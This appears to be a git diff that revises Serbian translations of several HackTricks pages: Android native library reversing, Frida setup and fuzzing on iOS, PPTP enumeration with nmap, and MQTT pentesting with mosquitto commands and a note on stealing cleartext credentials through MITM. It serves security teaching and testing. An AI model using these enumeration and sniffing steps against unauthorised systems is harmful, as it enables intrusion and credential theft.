|
||||
|
||||
- **Učitavanje i izvršavanje biblioteka:**
|
||||
- Biblioteke se učitavaju u memoriju korišćenjem `System.loadLibrary` ili `System.load`.
|
||||
- JNI_OnLoad se izvršava prilikom učitavanja biblioteke.
|
||||
- Java-deklarisane nativne metode povezuju se sa nativnim funkcijama, omogućavajući izvršavanje.
|
||||
- Java-deklarisani nativni metodi povezuju se sa nativnim funkcijama, omogućavajući izvršavanje.
|
||||
|
||||
- **Povezivanje Java metoda sa nativnim funkcijama:**
|
||||
- **Dinamičko povezivanje:** Imena funkcija u nativnim bibliotekama odgovaraju određenom obrascu, omogućavajući automatsko povezivanje.
|
||||
- **Statičko povezivanje:** Koristi `RegisterNatives` za povezivanje, pružajući fleksibilnost u imenovanju funkcija i strukturi.
|
||||
|
||||
- **Alati i tehnike reverznog inženjeringa:**
|
||||
- **Alati i tehnike za reverzno inženjerstvo:**
|
||||
- Alati poput Ghidra i IDA Pro pomažu u analizi nativnih biblioteka.
|
||||
- `JNIEnv` je ključan za razumevanje JNI funkcija i interakcija.
|
||||
- Vežbe su obezbeđene radi vežbanja učitavanja biblioteka, povezivanja metoda i identifikovanja nativnih funkcija.
|
||||
|
@ -63,24 +63,24 @@ Android aplikacije mogu koristiti nativne biblioteke, obično napisane u C ili C
|
|||
- Predloženo za dublje razumevanje osnovne arhitekture.
|
||||
- [Osnove ARM asemblerskog jezika](https://azeria-labs.com/writing-arm-assembly-part-1/) iz Azeria Labs se preporučuju.
|
||||
|
||||
- **JNI & NDK dokumentacija:**
|
||||
- **JNI & NDK Dokumentacija:**
|
||||
- [Oracle-ova JNI specifikacija](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
|
||||
- [Android-ovi saveti za JNI](https://developer.android.com/training/articles/perf-jni)
|
||||
- [Početak rada sa NDK-om](https://developer.android.com/ndk/guides/)
|
||||
|
||||
- **Debagovanje nativnih biblioteka:**
|
||||
- [Debagovanje Android nativnih biblioteka korišćenjem JEB dekompajlera](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
- **Debugiranje nativnih biblioteka:**
|
||||
- [Debugiranje Android nativnih biblioteka korišćenjem JEB dekompajlera](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -90,8 +90,8 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks suvenir**](https://peass.creator-spring.com)
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Konfiguracija iOS Frida
|
||||
# Konfiguracija Frida za iOS
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -28,9 +28,9 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
---
|
||||
|
||||
## Instalacija Fridda
|
||||
## Instalacija Frinde
|
||||
|
||||
**Koraci za instalaciju Fridda na Jailbroken uređaju:**
|
||||
**Koraci za instalaciju Fride na Jailbroken uređaju:**
|
||||
|
||||
1. Otvorite Cydia/Sileo aplikaciju.
|
||||
2. Idite na Upravljanje -> Izvori -> Uredi -> Dodaj.
|
||||
|
@ -40,8 +40,8 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Ako koristite **Corellium** moraćete preuzeti Frida izdanje sa [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) i raspakovati i kopirati na lokaciju dylib-a koju Frida traži, npr.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
|
||||
|
||||
Nakon instalacije, možete koristiti na svom računaru komandu **`frida-ls-devices`** i proveriti da li se uređaj pojavljuje (vaš računar mora moći da mu pristupi).\
|
||||
Takođe izvršite **`frida-ps -Uia`** da proverite pokrenute procese telefona.
|
||||
Nakon instalacije, možete koristiti komandu **`frida-ls-devices`** na svom računaru i proveriti da li se uređaj pojavljuje (vaš računar mora moći da mu pristupi).\
|
||||
Takođe izvršite **`frida-ps -Uia`** da biste proverili pokrenute procese na telefonu.
|
||||
|
||||
## Frida bez Jailbroken uređaja i bez patch-ovanja aplikacije
|
||||
|
||||
|
@ -79,7 +79,7 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
|
|||
```
|
||||
### Dobijanje svih klasa i metoda
|
||||
|
||||
* Automatsko završavanje: Samo izvršite `frida -U <program>`
|
||||
* Automatsko završavanje: Jednostavno izvršite `frida -U <program>`
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -105,7 +105,7 @@ console.log("Objective-C runtime is not available.");
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* Dobij **sve** **metode** jedne **klase** (filtriraj po stringu)
|
||||
* Dobijanje **svih** **metoda** jedne **klase** (filtrirano po stringu)
|
||||
|
||||
{% code title="/tmp/script.js" %}
|
||||
```javascript
|
||||
|
@ -210,7 +210,7 @@ Ovo je zanimljivo iz razloga debagiranja, ali za fuzzing, stalno koristiti **`.f
|
|||
|
||||
## [Fpicker](https://github.com/ttdennis/fpicker)
|
||||
|
||||
[**fpicker**](https://github.com/ttdennis/fpicker) je **Frida-based fuzzing suite** koji nudi različite režime fuzzinga za fuzzing unutar procesa, poput AFL++ režima ili pasivnog režima praćenja. Trebalo bi da radi na svim platformama koje podržava Frida.
|
||||
[**fpicker**](https://github.com/ttdennis/fpicker) je **Frida baziran alat za fuzzing** koji nudi različite režime fuzzinga za fuzzing unutar procesa, kao što su AFL++ režim ili pasivni režim praćenja. Trebalo bi da radi na svim platformama koje podržava Frida.
|
||||
|
||||
* [**Instaliraj fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
|
||||
```bash
|
||||
|
@ -241,9 +241,9 @@ mkdir -p examples/wg-log/in # For starting inputs
|
|||
# Create at least 1 input for the fuzzer
|
||||
echo Hello World > examples/wg-log/in/0
|
||||
```
|
||||
* **Fuzzer skripta** (`primeri/wg-log/mojfuzzer.js`):
|
||||
* **Fuzzer skripta** (`primjeri/wg-log/mojfuzzer.js`):
|
||||
|
||||
{% code title="primeri/wg-log/mojfuzzer.js" %}
|
||||
{% code title="primjeri/wg-log/mojfuzzer.js" %}
|
||||
```javascript
|
||||
// Import the fuzzer base class
|
||||
import { Fuzzer } from "../../harness/fuzzer.js";
|
||||
|
@ -323,18 +323,18 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
U ovom slučaju **ne ponovo pokrećemo aplikaciju ili vraćamo stanje** nakon svakog payload-a. Dakle, ako Frida pronađe **pad sistema**, **sledeći unosi** nakon tog payload-a takođe mogu **srušiti aplikaciju** (jer je aplikacija u nestabilnom stanju), čak i ako **unos ne bi trebalo da sruši** aplikaciju.
|
||||
U ovom slučaju **ne restartujemo aplikaciju niti vraćamo stanje** nakon svakog payload-a. Dakle, ako Frida pronađe **pad sistema**, **sledeći unosi** nakon tog payload-a takođe mogu **izazvati pad aplikacije** (jer je aplikacija u nestabilnom stanju), čak i ako **unos ne bi trebalo da izazove pad** aplikacije.
|
||||
|
||||
Osim toga, Frida će se povezati sa signalima izuzetaka iOS-a, pa kada **Frida pronađe pad sistema**, verovatno neće biti generisani **izveštaji o padu sistema iOS-a**.
|
||||
Osim toga, Frida će se povezati sa signalima izuzetaka iOS-a, pa kada **Frida pronađe pad sistema**, verovatno neće biti generisani **izveštaji o padu iOS-a**.
|
||||
|
||||
Da biste to sprečili, na primer, možemo ponovo pokrenuti aplikaciju nakon svakog Frida pada.
|
||||
Da bismo to sprečili, na primer, mogli bismo ponovo pokrenuti aplikaciju nakon svakog Frida pada.
|
||||
{% endhint %}
|
||||
|
||||
### Zapisi i Pada
|
||||
|
||||
Možete proveriti **macOS konzolu** ili **`log`** cli da biste proverili macOS zapise.\
|
||||
Takođe možete proveriti zapise sa iOS uređaja koristeći **`idevicesyslog`**.\
|
||||
Neki zapisi će izostaviti informacije dodajući **`<private>`**. Da biste videli sve informacije, morate instalirati neki profil sa [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) da biste omogućili te privatne informacije.
|
||||
Neki zapisi će izostaviti informacije dodajući **`<private>`**. Da biste videli sve informacije, morate instalirati neki profil sa [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kako biste omogućili te privatne informacije.
|
||||
|
||||
Ako ne znate šta da radite:
|
||||
```sh
|
||||
|
@ -352,15 +352,15 @@ killall -9 logd
|
|||
```
|
||||
Možete proveriti rušenja u:
|
||||
|
||||
* **iOS**
|
||||
* Postavke → Privatnost → Analitika i unapređenja → Podaci o analitici
|
||||
* `/private/var/mobile/Library/Logs/CrashReporter/`
|
||||
* **macOS**:
|
||||
* `/Library/Logs/DiagnosticReports/`
|
||||
* `~/Library/Logs/DiagnosticReports`
|
||||
- **iOS**
|
||||
- Postavke → Privatnost → Analitika i unapređenja → Podaci o analitici
|
||||
- `/private/var/mobile/Library/Logs/CrashReporter/`
|
||||
- **macOS**:
|
||||
- `/Library/Logs/DiagnosticReports/`
|
||||
- `~/Library/Logs/DiagnosticReports`
|
||||
|
||||
{% hint style="warning" %}
|
||||
iOS čuva samo 25 rušenja iste aplikacije, pa je potrebno očistiti ih ili će iOS prestati da kreira rušenja.
|
||||
iOS čuva samo 25 rušenja iste aplikacije, stoga morate to očistiti ili će iOS prestati da pravi rušenja.
|
||||
{% endhint %}
|
||||
|
||||
## Frida Android Tutorijali
|
||||
|
@ -374,15 +374,15 @@ iOS čuva samo 25 rušenja iste aplikacije, pa je potrebno očistiti ih ili će
|
|||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dubokoj mreži** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -393,7 +393,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač **dark web-a** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno** na:
|
||||
|
||||
|
@ -32,7 +32,7 @@ Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno**
|
|||
|
||||
**Point-to-Point Tunneling Protocol (PPTP)** je metoda široko korišćena za **udaljeni pristup** mobilnim uređajima. Koristi **TCP port 1723** za razmenu ključeva, dok se **IP protokol 47** (Generic Routing Encapsulation, ili **GRE**), koristi za enkripciju podataka koji se prenose između parova. Ova postavka je ključna za uspostavljanje sigurnog komunikacionog kanala preko interneta, osiguravajući da razmenjeni podaci ostanu poverljivi i zaštićeni od neovlašćenog pristupa.
|
||||
|
||||
**Podrazumevani port**: 1723
|
||||
**Podrazumevani port**:1723
|
||||
|
||||
## Enumeracija
|
||||
```bash
|
||||
|
@ -50,7 +50,7 @@ nmap –Pn -sSV -p1723 <IP>
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -6,23 +6,23 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
## Osnovne informacije
|
||||
|
||||
**MQ Telemetry Transport (MQTT)** poznat je kao **protokol za razmenu poruka putem objavljivanja/pretplate** koji se ističe po svojoj ekstremnoj jednostavnosti i laganoći. Ovaj protokol je posebno prilagođen za okruženja u kojima uređaji imaju ograničene mogućnosti i funkcionišu preko mreža koje se karakterišu niskom propusnošću, visokom latencijom ili nepouzdanim vezama. Osnovni ciljevi MQTT-a uključuju minimiziranje korišćenja mrežne propusnosti i smanjenje zahteva na resurse uređaja. Pored toga, cilj mu je održavanje pouzdane komunikacije i pružanje određenog nivoa sigurnosti isporuke. Ovi ciljevi čine MQTT izuzetno pogodnim za rastuće polje **komunikacije mašina sa mašinama (M2M)** i **Interneta stvari (IoT)**, gde je esencijalno efikasno povezivanje različitih uređaja. Osim toga, MQTT je veoma koristan za mobilne aplikacije, gde je čuvanje propusnosti i trajanja baterije ključno.
|
||||
**MQ Telemetry Transport (MQTT)** poznat je kao **protokol za razmenu poruka putem objavljivanja/pretplate** koji se ističe po svojoj ekstremnoj jednostavnosti i lakoći. Ovaj protokol je posebno prilagođen za okruženja u kojima uređaji imaju ograničene mogućnosti i funkcionišu preko mreža koje se karakterišu niskom propusnošću, visokom latencijom ili nepouzdanim vezama. Osnovni ciljevi MQTT-a uključuju minimiziranje korišćenja mrežne propusnosti i smanjenje zahteva na resurse uređaja. Pored toga, cilj mu je održavanje pouzdane komunikacije i pružanje određenog nivoa sigurnosti isporuke. Ovi ciljevi čine MQTT izuzetno pogodnim za rastuće polje **komunikacije mašina sa mašinama (M2M)** i **Interneta stvari (IoT)**, gde je esencijalno efikasno povezivanje različitih uređaja. Osim toga, MQTT je veoma koristan za mobilne aplikacije, gde je čuvanje propusnosti i trajanja baterije od suštinskog značaja.
|
||||
|
||||
**Podrazumevani port:** 1883
|
||||
```
|
||||
|
@ -54,7 +54,7 @@ Na primer, ako posrednik odbije vezu zbog nevažećih pristupnih podataka, scena
|
|||
|
||||
## Pentesting MQTT
|
||||
|
||||
**Autentifikacija je potpuno opcionalna** i čak i ako se vrši autentifikacija, **podrazumevano se ne koristi šifrovanje** (kredencijali se šalju u čistom tekstu). MITM napadi i dalje mogu biti izvršeni kako bi se ukrali lozinke.
|
||||
**Autentikacija je potpuno opcionalna** i čak i ako se vrši autentikacija, **podrazumevano se ne koristi šifrovanje** (kredencijali se šalju u čistom tekstu). Napadi MITM-a i dalje mogu biti izvršeni radi krađe lozinki.
|
||||
|
||||
Za povezivanje na MQTT servis možete koristiti: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) i pretplatiti se na sve teme koristeći:
|
||||
```
|
||||
|
@ -63,8 +63,6 @@ Za povezivanje na MQTT servis možete koristiti: [https://github.com/bapowell/py
|
|||
> subscribe "$SYS/#"
|
||||
```
|
||||
Možete koristiti [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)
|
||||
|
||||
Možete takođe koristiti:
|
||||
```bash
|
||||
apt-get install mosquitto mosquitto-clients
|
||||
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
|
||||
|
@ -123,16 +121,16 @@ Svaki MQTT paket sadrži fiksni zaglavlje (Slika 02).Slika 02: Fiksno zaglavlje
|
|||
* CONNECT (1): Iniciran od strane klijenta zahtevajući vezu sa serverom.
|
||||
* CONNACK (2): Potvrda servera o uspešnoj vezi.
|
||||
* PUBLISH (3): Koristi se za slanje poruke od klijenta ka serveru ili obrnuto.
|
||||
* PUBACK (4): Potvrda za PUBLISH paket.
|
||||
* PUBACK (4): Potvrda o PUBLISH paketu.
|
||||
* PUBREC (5): Deo protokola isporuke poruke koji osigurava da je poruka primljena.
|
||||
* PUBREL (6): Dodatno osiguranje u isporuci poruke, ukazujući na oslobađanje poruke.
|
||||
* PUBCOMP (7): Završni deo protokola isporuke poruke, ukazujući na završetak.
|
||||
* SUBSCRIBE (8): Zahtev klijenta za slušanje poruka sa određene teme.
|
||||
* SUBACK (9): Potvrda servera o SUBSCRIBE zahtevu.
|
||||
* UNSUBSCRIBE (10): Zahtev klijenta za prestanak primanja poruka sa određene teme.
|
||||
* UNSUBACK (11): Odgovor servera na UNSUBSCRIBE zahtev.
|
||||
* PINGREQ (12): Poruka o održavanju veze poslata od strane klijenta.
|
||||
* PINGRESP (13): Odgovor servera na poruku o održavanju veze.
|
||||
* SUBSCRIBE (8): Zahtev klijenta za slušanje poruka sa teme.
|
||||
* SUBACK (9): Potvrda servera o zahtevu za SUBSCRIBE.
|
||||
* UNSUBSCRIBE (10): Zahtev klijenta za prestanak primanja poruka sa teme.
|
||||
* UNSUBACK (11): Odgovor servera na zahtev UNSUBSCRIBE.
|
||||
* PINGREQ (12): Poruka o otkucaju poslata od strane klijenta.
|
||||
* PINGRESP (13): Odgovor servera na poruku o otkucaju.
|
||||
* DISCONNECT (14): Iniciran od strane klijenta za prekid veze.
|
||||
* Dve vrednosti, 0 i 15, označene su kao rezervisane i njihova upotreba je zabranjena.
|
||||
|
||||
|
@ -140,13 +138,13 @@ Svaki MQTT paket sadrži fiksni zaglavlje (Slika 02).Slika 02: Fiksno zaglavlje
|
|||
|
||||
* `port:1883 MQTT`
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dubokom webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera za krađu**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji kradu informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -158,7 +156,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
